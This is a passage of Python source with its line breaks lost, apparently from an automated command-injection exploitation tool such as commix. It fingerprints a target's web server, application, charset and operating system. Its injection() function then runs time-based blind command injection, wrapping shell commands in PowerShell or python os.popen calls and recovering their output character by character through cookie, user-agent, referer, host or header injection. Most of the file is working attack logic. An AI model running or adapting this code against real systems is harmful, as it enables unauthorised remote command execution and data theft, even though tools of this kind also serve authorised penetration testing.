def server_identification(server_banner): found_server_banner = False if settings.VERBOSITY_LEVEL != 0: debug_msg = "Identifying the target server. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() for i in range(0,len(settings.SERVER_BANNERS)): match = re.search(settings.SERVER_BANNERS[i].lower(), server_banner.lower()) if match: if settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) if settings.VERBOSITY_LEVEL != 0: debug_msg = "The target server identified as " debug_msg += server_banner + Style.RESET_ALL + "." print(settings.print_bold_debug_msg(debug_msg)) settings.SERVER_BANNER = match.group(0) found_server_banner = True # Set up default root paths if "apache" in settings.SERVER_BANNER.lower(): if settings.TARGET_OS == "win": settings.WEB_ROOT = "\\htdocs" else: settings.WEB_ROOT = "/var/www" elif "nginx" in settings.SERVER_BANNER.lower(): settings.WEB_ROOT = "/usr/share/nginx" elif "microsoft-iis" in settings.SERVER_BANNER.lower(): settings.WEB_ROOT = "\\inetpub\\wwwroot" break else: if settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) warn_msg = "The server which identified as '" warn_msg += server_banner + "' seems unknown." print(settings.print_warning_msg(warn_msg))
def application_identification(url): found_application_extension = False if settings.VERBOSITY_LEVEL != 0: debug_msg = "Identifying the target application." sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() root, application_extension = splitext(_urllib.parse.urlparse(url).path) settings.TARGET_APPLICATION = application_extension[1:].upper() if settings.TARGET_APPLICATION: found_application_extension = True if settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) debug_msg = "The target application identified as " debug_msg += settings.TARGET_APPLICATION + Style.RESET_ALL + "." print(settings.print_bold_debug_msg(debug_msg)) # Check for unsupported target applications for i in range(0,len(settings.UNSUPPORTED_TARGET_APPLICATION)): if settings.TARGET_APPLICATION.lower() in settings.UNSUPPORTED_TARGET_APPLICATION[i].lower(): err_msg = settings.TARGET_APPLICATION + " exploitation is not yet supported." print(settings.print_critical_msg(err_msg)) raise SystemExit() if not found_application_extension: if settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) warn_msg = "Heuristics have failed to identify target application." print(settings.print_warning_msg(warn_msg))
def technology_detection(response): if settings.VERBOSITY_LEVEL != 0: debug_msg = "Identifying the technology supporting the target application. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() print(settings.SPACE) if response.info()['X-Powered-By']: if settings.VERBOSITY_LEVEL != 0: debug_msg = "The target application is powered by " debug_msg += response.info()['X-Powered-By'] + Style.RESET_ALL + "." print(settings.print_bold_debug_msg(debug_msg)) else: if settings.VERBOSITY_LEVEL != 0: warn_msg = "Heuristics have failed to identify the technology supporting the target application." print(settings.print_warning_msg(warn_msg))
def encoding_detection(response): if not menu.options.encoding: charset_detected = False if settings.VERBOSITY_LEVEL != 0: debug_msg = "Identifying the indicated web-page charset. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() try: # Detecting charset try: # Support for python 2.7.x charset = response.headers.getparam('charset') except AttributeError: # Support for python 3.x charset = response.headers.get_content_charset() if charset != None and len(charset) != 0 : charset_detected = True else: content = re.findall(r"charset=['\"](.*)['\"]", response.read())[0] if len(content) != 0 : charset = content charset_detected = True else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*?)['\"]", response.read())[0] if len(charset) != 0 : charset_detected = True # Check the identifyied charset if charset_detected : settings.DEFAULT_PAGE_ENCODING = charset if settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) if settings.DEFAULT_PAGE_ENCODING.lower() not in settings.ENCODING_LIST: warn_msg = "The indicated web-page charset " + settings.DEFAULT_PAGE_ENCODING + " seems unknown." print(settings.print_warning_msg(warn_msg)) else: if settings.VERBOSITY_LEVEL != 0: debug_msg = "The indicated web-page charset appears to be " debug_msg += settings.DEFAULT_PAGE_ENCODING + Style.RESET_ALL + "." print(settings.print_bold_debug_msg(debug_msg)) else: pass except: pass if charset_detected == False and settings.VERBOSITY_LEVEL != 0: print(settings.SPACE) warn_msg = "Heuristics have failed to identify indicated web-page charset." print(settings.print_warning_msg(warn_msg))
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False info_msg = "Retrieving the length of execution output. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL > 1: print("") for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) # Examine time-responses injection_check = False if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if output_length > 1: if settings.VERBOSITY_LEVEL >= 1: pass else: sys.stdout.write(settings.SUCCESS_STATUS + "\n") sys.stdout.flush() if settings.VERBOSITY_LEVEL == 1: print("") if settings.VERBOSITY_LEVEL >= 1: debug_msg = "Retrieved the length of execution output: " + str(output_length) print(settings.print_bold_debug_msg(debug_msg)) else: sub_content = "Retrieved: " + str(output_length) print(settings.print_sub_content(sub_content)) found_chars = True injection_check = False break # Proceed with the next (injection) step! if found_chars == True : if settings.TARGET_OS == "win": cmd = previous_cmd num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = "0.0%" info_msg = "Presuming the execution output." if menu.options.verbose < 1 : info_msg += ".. (" + str(percent) + ")" elif menu.options.verbose == 1 : info_msg += "" else: info_msg += "\n" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): char_pool = checks.generate_char_pool(num_of_chars) for ascii_char in char_pool: if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) # Examine time-responses injection_check = False if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if settings.VERBOSITY_LEVEL == 0: output.append(chr(ascii_char)) percent = ((num_of_chars*100)/output_length) float_percent = str("{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2))) + "%" if percent == 100: float_percent = settings.SUCCESS_MSG else: float_percent = ".. (" + str(float_percent) + ")" info_msg = "Presuming the execution output." info_msg += float_percent sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: output.append(chr(ascii_char)) injection_check = False break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if settings.VERBOSITY_LEVEL == 0: sys.stdout.write(settings.FAIL_STATUS) sys.stdout.flush() else: pass #print("") check_how_long = 0 output = False if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session: print("") return check_how_long, output
def check_target_os(server_banner): found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS if settings.VERBOSITY_LEVEL != 0: debug_msg = "Identifying the target operating system. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() # Procedure for target OS identification. for i in range(0,len(settings.SERVER_OS_BANNERS)): match = re.search(settings.SERVER_OS_BANNERS[i].lower(), server_banner.lower()) if match: found_os_server = True settings.TARGET_OS = match.group(0) match = re.search(r"microsoft|win", settings.TARGET_OS) if match: identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: err_msg = "The shellshock module is not available for " err_msg += identified_os + " targets." print(settings.print_critical_msg(err_msg)) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os if settings.VERBOSITY_LEVEL != 0 : if found_os_server: print(settings.SPACE) debug_msg = "The target operating system appears to be " debug_msg += identified_os.title() + Style.RESET_ALL + "." print(settings.print_bold_debug_msg(debug_msg)) else: print(settings.SPACE) warn_msg = "Heuristics have failed to identify server's operating system." print(settings.print_warning_msg(warn_msg)) if found_os_server == False and not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: if menu.options.batch: if not settings.CHECK_BOTH_OS: settings.CHECK_BOTH_OS = True check_type = "unix-based" elif settings.CHECK_BOTH_OS: settings.TARGET_OS = "win" settings.CHECK_BOTH_OS = False settings.PERFORM_BASIC_SCANS = True check_type = "windows-based" info_msg = "Setting the " + check_type + " payloads." print(settings.print_info_msg(info_msg)) else: while True: question_msg = "Do you recognise the server's operating system? " question_msg += "[(W)indows/(U)nix/(q)uit] > " got_os = _input(settings.print_question_msg(question_msg)) if got_os.lower() in settings.CHOICE_OS : if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: err_msg = "'" + got_os + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass
def total_of_requests(): debug_msg = "Identified the following injection point with " debug_msg += "a total of " + str(settings.TOTAL_OF_REQUESTS) + " HTTP(S) requests." print(settings.print_bold_debug_msg(debug_msg))